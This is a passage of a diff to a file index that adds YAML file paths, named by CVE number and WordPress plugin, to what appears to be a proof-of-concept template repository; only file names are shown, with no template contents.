./poc/cve/CVE-2024-4553.yaml ./poc/cve/CVE-2024-4560-0ea67d02a73eaa7d44010307ee3b0d37.yaml ./poc/cve/CVE-2024-4560.yaml +./poc/cve/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml ./poc/cve/CVE-2024-4564-d97a04c96edf2b3ce77ceef1ea501ee8.yaml ./poc/cve/CVE-2024-4564.yaml ./poc/cve/CVE-2024-4565-b2a339f038f0abdfe1886ac2a73d2760.yaml @@ -41567,6 +41583,8 @@ ./poc/cve/CVE-2024-5554.yaml ./poc/cve/CVE-2024-5555-c92cd8e90a91fbbeb76674d465f92774.yaml ./poc/cve/CVE-2024-5555.yaml +./poc/cve/CVE-2024-5561-b3779d524422cb5f6e75ef5f028e49f8.yaml +./poc/cve/CVE-2024-5567-a55055fd86860f71a8b1255aa0514d09.yaml ./poc/cve/CVE-2024-5570-5754473cb9c0ff5f3701493b1961b197.yaml ./poc/cve/CVE-2024-5570.yaml ./poc/cve/CVE-2024-5571-747501ea372022d72c5c50040ba89efd.yaml @@ -41619,6 +41637,7 @@ ./poc/cve/CVE-2024-5626.yaml ./poc/cve/CVE-2024-5627-5d69541572ed8fe18605fc3ba5170b27.yaml ./poc/cve/CVE-2024-5627.yaml +./poc/cve/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml ./poc/cve/CVE-2024-5630-914f0b3c2b6c0410d9f770e5e5c6831d.yaml ./poc/cve/CVE-2024-5630.yaml ./poc/cve/CVE-2024-5637-52143d378292b1918b667c9107493dca.yaml @@ -41718,6 +41737,7 @@ ./poc/cve/CVE-2024-5787.yaml ./poc/cve/CVE-2024-5788-28fe2f5078d75f5024e6c25cc111ffd2.yaml ./poc/cve/CVE-2024-5788.yaml +./poc/cve/CVE-2024-5789-aefcab5998ef352002c627c10b26cbb1.yaml ./poc/cve/CVE-2024-5790-e1a1b95d3201b8fb367b3f067a7c83e8.yaml ./poc/cve/CVE-2024-5790.yaml ./poc/cve/CVE-2024-5791-1c1f2db63c5fca19a57edd92322cd84c.yaml @@ -41768,8 +41788,11 @@ ./poc/cve/CVE-2024-5863.yaml ./poc/cve/CVE-2024-5864-a14d3fb112fed3b92e729002624bec5e.yaml ./poc/cve/CVE-2024-5864.yaml +./poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml ./poc/cve/CVE-2024-5868-6851b372736e27b6f14c386eb3b66752.yaml ./poc/cve/CVE-2024-5868.yaml +./poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml +./poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml ./poc/cve/CVE-2024-5871-bdd808d6a9eceafe261c336341d9e130.yaml ./poc/cve/CVE-2024-5871.yaml ./poc/cve/CVE-2024-5879-15e47d64ae81bc253ae61d7b9ab17d63.yaml @@ -41782,6 +41805,7 @@ ./poc/cve/CVE-2024-5882.yaml ./poc/cve/CVE-2024-5883-4ea56479d34da8ced01e77d0ad3ee73b.yaml ./poc/cve/CVE-2024-5883.yaml +./poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml ./poc/cve/CVE-2024-5889-bec7e2710836223e5ff121d13dac5e19.yaml ./poc/cve/CVE-2024-5889.yaml ./poc/cve/CVE-2024-5892-e23cd3e0ccd8a12c9764022d7c13bd45.yaml @@ -41855,6 +41879,7 @@ ./poc/cve/CVE-2024-6018.yaml ./poc/cve/CVE-2024-6019-ec7b6702246a7d9e677e019d1313f6b0.yaml ./poc/cve/CVE-2024-6019.yaml +./poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml ./poc/cve/CVE-2024-6021-b2c11ef440f6b0c19e877eb7e43d2618.yaml ./poc/cve/CVE-2024-6021-d63209bf8f0de8a6bee60f11eccbf1bd.yaml ./poc/cve/CVE-2024-6021.yaml @@ -42165,6 +42190,7 @@ ./poc/cve/CVE-2024-6532.yaml ./poc/cve/CVE-2024-6536-644da1db5433ec7e98e563b0b0d6504a.yaml ./poc/cve/CVE-2024-6536.yaml +./poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml ./poc/cve/CVE-2024-6545-8b9c1464db2b925c36397d987977aec8.yaml ./poc/cve/CVE-2024-6545.yaml ./poc/cve/CVE-2024-6546-f23673e1fffccaa3f321e319f1fae99c.yaml @@ -42337,6 +42363,7 @@ ./poc/cve/CVE-2024-6767.yaml ./poc/cve/CVE-2024-6770-01c00266a3ecd5089728d5265405f17a.yaml ./poc/cve/CVE-2024-6770.yaml +./poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml ./poc/cve/CVE-2024-6797-b6db90f6651f67f2c92f688656bcca15.yaml ./poc/cve/CVE-2024-6797.yaml ./poc/cve/CVE-2024-6798-eb9be24d8046a94a2430be02faaec1bd.yaml @@ -42357,6 +42384,7 @@ ./poc/cve/CVE-2024-6836.yaml ./poc/cve/CVE-2024-6843-4c73645cda7e25187e67e72d3f09f636.yaml ./poc/cve/CVE-2024-6843.yaml +./poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml ./poc/cve/CVE-2024-6847-9a165e464b4249dac837d561aa7d8666.yaml ./poc/cve/CVE-2024-6847.yaml ./poc/cve/CVE-2024-6848-3b207bc0d16195d4ae82f368122194b4.yaml @@ -42390,6 +42418,8 @@ ./poc/cve/CVE-2024-6884.yaml ./poc/cve/CVE-2024-6885-cda59c05d6624f0c5bb2fbd29767530a.yaml ./poc/cve/CVE-2024-6885.yaml +./poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml +./poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml ./poc/cve/CVE-2024-6894-586a0881c5d8ae66a61b156d7983f464.yaml ./poc/cve/CVE-2024-6894-b8cf7cbce2861feb07b407ff4fc7c58d.yaml ./poc/cve/CVE-2024-6894.yaml @@ -42397,6 +42427,7 @@ ./poc/cve/CVE-2024-6896.yaml ./poc/cve/CVE-2024-6897-5f6f0e8f915bf7c9250813dd8889f603.yaml ./poc/cve/CVE-2024-6897.yaml +./poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml ./poc/cve/CVE-2024-6924-57b89cd5c7aee5c3239825f7590be4bb.yaml ./poc/cve/CVE-2024-6924.yaml ./poc/cve/CVE-2024-6925-c9f8459a9480a0976a80921b86688132.yaml @@ -42448,6 +42479,7 @@ ./poc/cve/CVE-2024-7112.yaml ./poc/cve/CVE-2024-7122-332eadd538ee19c7f5056f343ea0b155.yaml ./poc/cve/CVE-2024-7122.yaml +./poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml ./poc/cve/CVE-2024-7134-68ccbd22e014b574fd8573f2d56f4553.yaml ./poc/cve/CVE-2024-7134.yaml ./poc/cve/CVE-2024-7135-4efde48e672954d3ec911965413e7bde.yaml @@ -42491,6 +42523,7 @@ ./poc/cve/CVE-2024-7351.yaml ./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml ./poc/cve/CVE-2024-7353.yaml +./poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml ./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml ./poc/cve/CVE-2024-7355.yaml ./poc/cve/CVE-2024-7356-e407b53caac26f66b43c955c6cf7ef5c.yaml @@ -42529,6 +42562,7 @@ ./poc/cve/CVE-2024-7420.yaml ./poc/cve/CVE-2024-7422-687a511b4014fc6e48564ef68ecc160f.yaml ./poc/cve/CVE-2024-7422.yaml +./poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml ./poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml ./poc/cve/CVE-2024-7435.yaml ./poc/cve/CVE-2024-7447-616934177af234fd0293527159d2650e.yaml @@ -42627,6 +42661,7 @@ ./poc/cve/CVE-2024-7702.yaml ./poc/cve/CVE-2024-7703-7d232ae776193850ef9d74eec7d98698.yaml ./poc/cve/CVE-2024-7703.yaml +./poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml ./poc/cve/CVE-2024-7717.yaml ./poc/cve/CVE-2024-7721-dabffc45b2b1ccb0d8463248830df7d5.yaml @@ -42645,6 +42680,7 @@ ./poc/cve/CVE-2024-7780.yaml ./poc/cve/CVE-2024-7782-33cd7b02fe64ca6292df042c7ea86c84.yaml ./poc/cve/CVE-2024-7782.yaml +./poc/cve/CVE-2024-7786-bad1bfe3a589408fe56217e3142344ed.yaml ./poc/cve/CVE-2024-7791-1535a2c9bf91c5d74bf51cb32be9b8f4.yaml ./poc/cve/CVE-2024-7791.yaml ./poc/cve/CVE-2024-7816-51e92a8e0f7a061869b80a8bec127c9d.yaml @@ -42684,16 +42720,20 @@ ./poc/cve/CVE-2024-7870-4b3910b5527f496007ddf9a3918025ed.yaml ./poc/cve/CVE-2024-7870-8f97f143492468182d67786194a0ead7.yaml ./poc/cve/CVE-2024-7870.yaml +./poc/cve/CVE-2024-7888-483a84d579a54e76d3a8b4799ba22e2b.yaml +./poc/cve/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml ./poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml ./poc/cve/CVE-2024-7895.yaml ./poc/cve/CVE-2024-7918-a7e65e7119ee7b26b163171cf42cfe15.yaml ./poc/cve/CVE-2024-7918.yaml ./poc/cve/CVE-2024-7950-4a4c660d480c32376f512832d16b17e2.yaml ./poc/cve/CVE-2024-7950.yaml +./poc/cve/CVE-2024-7955-5e9fd490f09c7370ea858a067ee264fd.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml ./poc/cve/CVE-2024-8016.yaml ./poc/cve/CVE-2024-8030-4bf23408e0dc80a213e018f362e5999c.yaml ./poc/cve/CVE-2024-8030.yaml +./poc/cve/CVE-2024-8031-f6e05cbf1fd3b18d02657892077c5da5.yaml ./poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml ./poc/cve/CVE-2024-8043.yaml ./poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml @@ -42742,6 +42782,7 @@ ./poc/cve/CVE-2024-8200.yaml ./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml ./poc/cve/CVE-2024-8241.yaml +./poc/cve/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml ./poc/cve/CVE-2024-8247.yaml ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml @@ -42750,6 +42791,7 @@ ./poc/cve/CVE-2024-8253.yaml ./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml ./poc/cve/CVE-2024-8268.yaml +./poc/cve/CVE-2024-8269-eb32a5853ffb2001bfd3e5a673037190.yaml ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml ./poc/cve/CVE-2024-8274.yaml ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml @@ -42790,6 +42832,18 @@ ./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml ./poc/cve/CVE-2024-8543.yaml ./poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml +./poc/cve/CVE-2024-8656-1116395151f79029236816f9e11f544d.yaml +./poc/cve/CVE-2024-8663-483f5812b103f5a68eb659c586f798b2.yaml +./poc/cve/CVE-2024-8664-a1a28b91e5f96df0c76ded650a87a835.yaml +./poc/cve/CVE-2024-8665-d05eed41be11b2c07c036fabd71a8c1b.yaml +./poc/cve/CVE-2024-8714-03b5605b5eeba70097fb089d33700336.yaml +./poc/cve/CVE-2024-8730-efc3370bbeb807667af618ae74e58df1.yaml +./poc/cve/CVE-2024-8731-b5fad8172a537c5460328250b82e6ef6.yaml +./poc/cve/CVE-2024-8732-f30eab986c0f8516da683155679193fc.yaml +./poc/cve/CVE-2024-8734-0bca25c266f3dd7ab05ff586726bddcc.yaml +./poc/cve/CVE-2024-8737-bb181fa6ba6a94643f4ee6a0b1df28c1.yaml +./poc/cve/CVE-2024-8742-40e6379c1e4c681d6815f3308854ba0d.yaml +./poc/cve/CVE-2024-8747-f757d510ac120bf89329e22a6153766c.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -45106,6 +45160,7 @@ ./poc/cve/cve-2017-7269-3054.yaml ./poc/cve/cve-2017-7269-3055.yaml ./poc/cve/cve-2017-7269-3056.yaml +./poc/cve/cve-2017-7269.yaml ./poc/cve/cve-2017-7391-3057.yaml ./poc/cve/cve-2017-7391-3058.yaml ./poc/cve/cve-2017-7391-3059.yaml @@ -45239,6 +45294,7 @@ ./poc/cve/cve-2018-1000600-3146.yaml ./poc/cve/cve-2018-1000600-3147.yaml ./poc/cve/cve-2018-1000671-3148.yaml +./poc/cve/cve-2018-1000671.yaml ./poc/cve/cve-2018-1000856.yaml ./poc/cve/cve-2018-1000861-3149.yaml ./poc/cve/cve-2018-1000861-3150.yaml @@ -46330,6 +46386,7 @@ ./poc/cve/cve-2019-17503-3985.yaml ./poc/cve/cve-2019-17503-3986.yaml ./poc/cve/cve-2019-17503-3987.yaml +./poc/cve/cve-2019-17503.yaml ./poc/cve/cve-2019-17506-3988.yaml ./poc/cve/cve-2019-17506-3989.yaml ./poc/cve/cve-2019-17506-3990.yaml @@ -46559,6 +46616,7 @@ ./poc/cve/cve-2019-5127-4162.yaml ./poc/cve/cve-2019-5127-4163.yaml ./poc/cve/cve-2019-5127-4164.yaml +./poc/cve/cve-2019-5127.yaml ./poc/cve/cve-2019-5418-2(1).yaml ./poc/cve/cve-2019-5418-4165.yaml ./poc/cve/cve-2019-5418-4166.yaml @@ -46591,6 +46649,7 @@ ./poc/cve/cve-2019-6715-4189.yaml ./poc/cve/cve-2019-6715-4190.yaml ./poc/cve/cve-2019-6715-4191.yaml +./poc/cve/cve-2019-6715.yaml ./poc/cve/cve-2019-7192-4192.yaml ./poc/cve/cve-2019-7192-4193.yaml ./poc/cve/cve-2019-7192-4194.yaml @@ -60229,8 +60288,10 @@ ./poc/microsoft/mstore-api-1c2cd9ed5c2d1dcf576fe7aecb5ca226.yaml ./poc/microsoft/mstore-api-319cdcd8aefa6dfb47435662ea3be489.yaml ./poc/microsoft/mstore-api-3678a5cbd624bf906b9f1499b42e328d.yaml +./poc/microsoft/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml ./poc/microsoft/mstore-api-3bbe1e9b2827123550346928e2f78aea.yaml ./poc/microsoft/mstore-api-47e384bbd4951ebb4d217ea16a357447.yaml +./poc/microsoft/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml ./poc/microsoft/mstore-api-6455a4c18e211ec9c979086a333e3980.yaml ./poc/microsoft/mstore-api-6a7c29035944a1901b23ef2195208fe3.yaml ./poc/microsoft/mstore-api-79265025e2ae87c5e5adf65c0d03eeec.yaml @@ -60380,6 +60441,7 @@ ./poc/microsoft/ninja-forms-ccabcbbf6275bf0bb08ae99921344965.yaml ./poc/microsoft/ninja-forms-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/ninja-forms-db5cbbe2e62074df44cb5125a2b60b42.yaml +./poc/microsoft/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml ./poc/microsoft/ninja-forms-e43b3523df958527a8d4bbc970bc4aaf.yaml ./poc/microsoft/ninja-forms-e535687ce846105164059b938c1671b0.yaml ./poc/microsoft/ninja-forms-e61176c5d6fde32c74d54ba073739aa1.yaml @@ -60619,6 +60681,7 @@ ./poc/microsoft/sensei-lms-1111cefe24de1ace303deec63cfb9a0e.yaml ./poc/microsoft/sensei-lms-85a373e82ccc10a34f197c7718aea84b.yaml ./poc/microsoft/sensei-lms-c63bf77b4673b1516933ee9dbc12c7ea.yaml +./poc/microsoft/sensei-lms-ef4f55a1a9193b0f96c64942d4d06097.yaml ./poc/microsoft/sensei-lms.yaml ./poc/microsoft/sevone-nms-network-manager.yaml ./poc/microsoft/sfwd-lms-06323fb9edeca49ba23c68725457bd17.yaml @@ -65659,6 +65722,7 @@ ./poc/other/beaf-before-and-after-gallery.yaml ./poc/other/beanstalk-service.yaml ./poc/other/beast2.yaml +./poc/other/beauty-af9641ba5dc553a449654ef14a59f791.yaml ./poc/other/beauty-premium-5daae5daa6880f8a3ebf5f7b2a3f1a04.yaml ./poc/other/beauty-premium.yaml ./poc/other/beaver-builder-lite-version-025479fadd320f008366a6f2fd3c779a.yaml @@ -67414,6 +67478,7 @@ ./poc/other/carousel-ck-231c945bfa4ce8c56aadc3cf4c088d96.yaml ./poc/other/carousel-ck.yaml ./poc/other/carousel-slider-0d0eba60355dc02eab84d13e361d466d.yaml +./poc/other/carousel-slider-47bcd81d4514b99552c241ecb59905d9.yaml ./poc/other/carousel-slider-b8f8948314afe2dfa152d53175e6a8e3.yaml ./poc/other/carousel-slider-dd564aa389005739b56732e0a38ffccf.yaml ./poc/other/carousel-slider.yaml @@ -68083,6 +68148,7 @@ ./poc/other/classified-listing-224bb0277be96a151ca18daad36f2201.yaml ./poc/other/classified-listing-26cf8661550461b31f82955b1b21424a.yaml ./poc/other/classified-listing-96030500fe2554ea1cda13e31e7a5e40.yaml +./poc/other/classified-listing-ecc300d4a146eb5fa016a0c1753ad120.yaml ./poc/other/classified-listing-pro-2ba88182a44e9f497cd203cf952a1543.yaml ./poc/other/classified-listing-pro-96030500fe2554ea1cda13e31e7a5e40.yaml ./poc/other/classified-listing-pro.yaml @@ -68387,6 +68453,7 @@ ./poc/other/coblocks-951570b82856782d2bde0ef2d8953b85.yaml ./poc/other/coblocks-9d1c59fe83ca4e28dd3af29d8e77c052.yaml ./poc/other/coblocks-b8013a51f907a9f98cbb4eaf698b4488.yaml +./poc/other/coblocks-d1afbe7fe0adeb3b4e8c4851395b42e6.yaml ./poc/other/coblocks.yaml ./poc/other/cobubrazor_v8-Controller_fixt-info.yaml ./poc/other/cobubrazor_v8-Controller_fixt2-info.yaml @@ -69963,6 +70030,7 @@ ./poc/other/custom-permalinks-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/custom-permalinks-plugin.yaml ./poc/other/custom-permalinks.yaml +./poc/other/custom-post-limits-3783595ba4ef5e542f7f4b09997c59ec.yaml ./poc/other/custom-post-type-cpt-cusom-taxonomy-ct-manager-545458b7b7b2233a436d11a150e94027.yaml ./poc/other/custom-post-type-cpt-cusom-taxonomy-ct-manager.yaml ./poc/other/custom-post-type-generator-62b47aaf51a6b97163e1f37ffe1ee69d.yaml @@ -70343,6 +70411,7 @@ ./poc/other/delete-usermetas.yaml ./poc/other/delhivery-logistics-courier-e540fdefb7cb34683c3c4a72e8a9c3bc.yaml ./poc/other/delhivery-logistics-courier.yaml +./poc/other/delicate-be1dd882c5127ca050d4475dd55704a0.yaml ./poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml ./poc/other/delicious-recipes-ac6497f90b87539235fa65f903a4be42.yaml ./poc/other/delicious-recipes-b301e06b5394f13942c93a763ac7eb0e.yaml @@ -72138,6 +72207,7 @@ ./poc/other/email-newsletter-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/email-newsletter-plugin.yaml ./poc/other/email-newsletter.yaml +./poc/other/email-obfuscate-shortcode-be43cfd9d399fba1f8b44a6dac9327bb.yaml ./poc/other/email-posts-to-subscribers-bf2dac30125abd49dd9e0cd3b59ec33a.yaml ./poc/other/email-posts-to-subscribers-c8830a6cc3d68798ee1b5be70125e31e.yaml ./poc/other/email-posts-to-subscribers-f4b7849ec123d8892e647b6eb213be42.yaml @@ -72408,6 +72478,7 @@ ./poc/other/envira-gallery-lite-32368ae6a5469d45a7caf21e1380210d.yaml ./poc/other/envira-gallery-lite-8f0b64d9ba8fa97daf748f6b0a650153.yaml ./poc/other/envira-gallery-lite-ab612d61b55e5b2365104e73d3c0d7f9.yaml +./poc/other/envira-gallery-lite-bb5f23aa595372d8f56de7733b43289d.yaml ./poc/other/envira-gallery-lite-be6858d18e3b44c07ee6d02d08a75f44.yaml ./poc/other/envira-gallery-lite-e1a4fd441df05fc0e1b240bff24d1f48.yaml ./poc/other/envira-gallery-lite.yaml @@ -72578,6 +72649,7 @@ ./poc/other/essential-addons-elementor.yaml ./poc/other/essential-addons-for-elementor-lite-02194837ac03e660b13781ad83519599.yaml ./poc/other/essential-addons-for-elementor-lite-0314fd1ade04941b996bce69b979c4d2.yaml +./poc/other/essential-addons-for-elementor-lite-07659033abd50bc07bbb85d0c2c40ea8.yaml ./poc/other/essential-addons-for-elementor-lite-0d7d62c4c3a349a9125a1a2ef0f21f1e.yaml ./poc/other/essential-addons-for-elementor-lite-0eb4196c7399d1fe345df607ec0b5c1e.yaml ./poc/other/essential-addons-for-elementor-lite-197abae64baa9b6686127186f973525d.yaml @@ -72849,6 +72921,7 @@ ./poc/other/eventon-lite-250a778446871096fed9464ea542aa26.yaml ./poc/other/eventon-lite-5e15933f85c1ae0850fd7129fff3c095.yaml ./poc/other/eventon-lite-5ea7a8b49a8694cb7de5936b13beb211.yaml +./poc/other/eventon-lite-66feb39b6f192a89af6b7a7c392fc4f9.yaml ./poc/other/eventon-lite-76c6d55012bba447c24dac5e16bf0305.yaml ./poc/other/eventon-lite-784b3ad66752676549870272c0296b7f.yaml ./poc/other/eventon-lite-7d6f61ad995d28761e20471a4a33f4fd.yaml @@ -73946,6 +74019,7 @@ ./poc/other/floating-cart-xforwc-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/floating-cart-xforwc-e7d05b0a2c85ee1ade7bf5ca69c912bf.yaml ./poc/other/floating-cart-xforwc.yaml +./poc/other/floating-contact-628f849b35a63914cc2a2dfc18459221.yaml ./poc/other/floating-div-114bd9351dc168ff2f1bb8e40e437331.yaml ./poc/other/floating-div.yaml ./poc/other/floating-links-557dfeac01daa0367c681069c19d386e.yaml @@ -74335,6 +74409,7 @@ ./poc/other/formilla-live-chat-ce5a04e92c3bd1ea43e0e9b4093c5ca8.yaml ./poc/other/formilla-live-chat.yaml ./poc/other/forminator-0461683514363461c1699d88e0c2e9c6.yaml +./poc/other/forminator-1007572ad74a1525d3e599dfc0947e74.yaml ./poc/other/forminator-15217c33a82fd082c72467274eb68e92.yaml ./poc/other/forminator-2e20c35e4b7d5d40abb874e2befef419.yaml ./poc/other/forminator-3157536d48ecbbd188fe8656ce16162c.yaml @@ -78663,6 +78738,7 @@ ./poc/other/legal-pages-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/legal-pages-plugin.yaml ./poc/other/legal-pages.yaml +./poc/other/leira-cron-jobs-fe4abc94d1b3a54df636c66ccc18fe03.yaml ./poc/other/lemis-management-system.yaml ./poc/other/lenovo-enterprise-network-disk.yaml ./poc/other/lenovo-fp-panel.yaml @@ -79107,6 +79183,7 @@ ./poc/other/loyaa-information-automatic-editing-system.yaml ./poc/other/loytec-device.yaml ./poc/other/lpse.yaml +./poc/other/lucas-string-replace-91f4d8bbc24ad8bb807fb53be34c26ec.yaml ./poc/other/lucee-stack-trace-8666.yaml ./poc/other/lucee-stack-trace-8667.yaml ./poc/other/lucee-stack-trace-8668.yaml @@ -81280,6 +81357,7 @@ ./poc/other/nd-travel-4047b81ad624f9afe5b44c28c107b154.yaml ./poc/other/nd-travel-56a474e3276fcf1cfa3baee5b5204775.yaml ./poc/other/nd-travel.yaml +./poc/other/neighborly-2046cef31a20a206df02f665f01316a1.yaml ./poc/other/nelio-ab-testing-2f99f40186bbf33979977c797ec514b1.yaml ./poc/other/nelio-ab-testing-d72b5e601d56aaa2024c459354858a51.yaml ./poc/other/nelio-ab-testing-df8112ed611d215c20a5de6ca56c6f84.yaml @@ -82773,6 +82851,7 @@ ./poc/other/parallelus-unite-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/parallelus-unite-theme.yaml ./poc/other/parallelus-unite.yaml +./poc/other/parametros-preguicosos.yaml ./poc/other/paramount-7b5dc6f87494e206bcd91679f9317348.yaml ./poc/other/paramount-a7135c0ddcac242413a56646b0ca4214.yaml ./poc/other/paramount-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -82939,6 +83018,7 @@ ./poc/other/pdf-print-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/pdf-print-plugin.yaml ./poc/other/pdf-print.yaml +./poc/other/pdf-thumbnail-generator-501ab9fae6b71897e59ae34630113849.yaml ./poc/other/pdf-viewer-46a71b75013fa6a26ef2e9d2adc4ee07.yaml ./poc/other/pdf-viewer-block-f7380c7284411dca05a64069ce992d09.yaml ./poc/other/pdf-viewer-block.yaml @@ -83706,6 +83786,7 @@ ./poc/other/popup-maker-4eb10f58a2fde77d0f3d8517c551ce80.yaml ./poc/other/popup-maker-5af732f2d686543e8d937541b1d186e9.yaml ./poc/other/popup-maker-5ba7c4bb3b9a8cc4e2165774ddf9b3fa.yaml +./poc/other/popup-maker-699c5ccba8a85c1a969fe9ae0872dda6.yaml ./poc/other/popup-maker-73e6cd4118b9b5b79858a70f6be2cbed.yaml ./poc/other/popup-maker-8413514d726af0a2f1e4862b23e92661.yaml ./poc/other/popup-maker-9f279daa55ef5c0bf1b747b0faef3010.yaml @@ -86639,12 +86720,15 @@ ./poc/other/secupress.yaml ./poc/other/secure-admin-ip-b91323638af6807429ad9a8aa0924c83.yaml ./poc/other/secure-admin-ip.yaml +./poc/other/secure-copy-content-protection-5e0d9df78ac9d4442faef8b580ff6a03.yaml ./poc/other/secure-copy-content-protection-66c2c3ecab78dce633527d7784f556f9.yaml ./poc/other/secure-copy-content-protection-82b7f92c06e7e9099ea22e51aa3d1188.yaml ./poc/other/secure-copy-content-protection-9a9c5b72ff8e99b948899a54568729cd.yaml ./poc/other/secure-copy-content-protection-9f2393c84bd49d42fd02e60d3055b6a9.yaml +./poc/other/secure-copy-content-protection-a6226aec94d543dc2c23085879e76e28.yaml ./poc/other/secure-copy-content-protection.yaml ./poc/other/secure-donation.yaml +./poc/other/secure-downloads-5b228709f387f8ae0d1b397d9bc429ac.yaml ./poc/other/secure-file-manager-f246e7800bff92325c50ae85d0881b35.yaml ./poc/other/secure-file-manager.yaml ./poc/other/secure-files-28986e1f925cf1e7b07c6e99ce5d59a2.yaml @@ -88891,6 +88975,7 @@ ./poc/other/standout-color-boxes-and-buttons.yaml ./poc/other/star-network-utility.yaml ./poc/other/staragent.yaml +./poc/other/starbox-0b40d1ee6028266a39beb0c58d6d2b92.yaml ./poc/other/starbox-3bf106034d2c314e890eaa51b23b851a.yaml ./poc/other/starbox-427b6a88ed89093333ad7d781f4928cd.yaml ./poc/other/starbox-7cbf0dfe8f3623c38a458013e347974f.yaml @@ -89108,6 +89193,7 @@ ./poc/other/streak-crm-for-gmail-integration-for-contact-form-7-plugin.yaml ./poc/other/streak-crm-for-gmail-integration-for-contact-form-7.yaml ./poc/other/stream-2c4492c84148255161cc6cd91925c853.yaml +./poc/other/stream-42c36199990b21951ee1ae2816559fc3.yaml ./poc/other/stream-76d4bb676580c6a749ba1a66f811d318.yaml ./poc/other/stream-96be7602a4bbac6ec810aaa4af6e7ff7.yaml ./poc/other/stream-affff7160b48377fafd9ea459452eb0b.yaml @@ -90964,6 +91050,7 @@ ./poc/other/twchat-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/twchat-plugin.yaml ./poc/other/twchat.yaml +./poc/other/tweaker5-7499f94acf789ea7420fecd8147fd86f.yaml ./poc/other/tweeple-c09da88e763a76454c1f5cd48b0f9ec5.yaml ./poc/other/tweeple.yaml ./poc/other/tweet-blender-ceaa25919651090fe72a2b84b252f994.yaml @@ -99878,6 +99965,7 @@ ./poc/search/smart-woocommerce-search.yaml ./poc/search/smartsearchwp-22ceafab668da8aceedda2211b679417.yaml ./poc/search/smartsearchwp-88af2e7689c887d198ef309920089cf6.yaml +./poc/search/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml ./poc/search/smartsearchwp.yaml ./poc/search/sort-searchresult-by-title-86feb80f760342151e6b43a07a4c470f.yaml ./poc/search/sort-searchresult-by-title.yaml @@ -102458,6 +102546,7 @@ ./poc/sql/CVE-2023-46775-fa3c164e68edbfcd38c2363997e968bc.yaml ./poc/sql/CVE-2023-46777-5a2317102f6d3d6e8aa325c42db23368.yaml ./poc/sql/CVE-2023-46821-db09b5836dd6824b2072d59978709e04.yaml +./poc/sql/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml ./poc/sql/CVE-2023-47187-909c68db201bde38a76a95d22a6d1f88.yaml ./poc/sql/CVE-2023-47238-38157848adc81d3839ed96e64dba336d.yaml ./poc/sql/CVE-2023-47513-cdd05d50eb3c42421a74ddbb27f26ee6.yaml @@ -102989,6 +103078,7 @@ ./poc/sql/CVE-2024-3664-deb11912ff3d2208242b76566e91d4db.yaml ./poc/sql/CVE-2024-3666-5076756317edfc235b845db17943ad41.yaml ./poc/sql/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml +./poc/sql/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml ./poc/sql/CVE-2024-3680-ec7d53ee9433a071987bdb6ca3443c79.yaml ./poc/sql/CVE-2024-37093-263295f735f2db17989d7aaa00124f9c.yaml 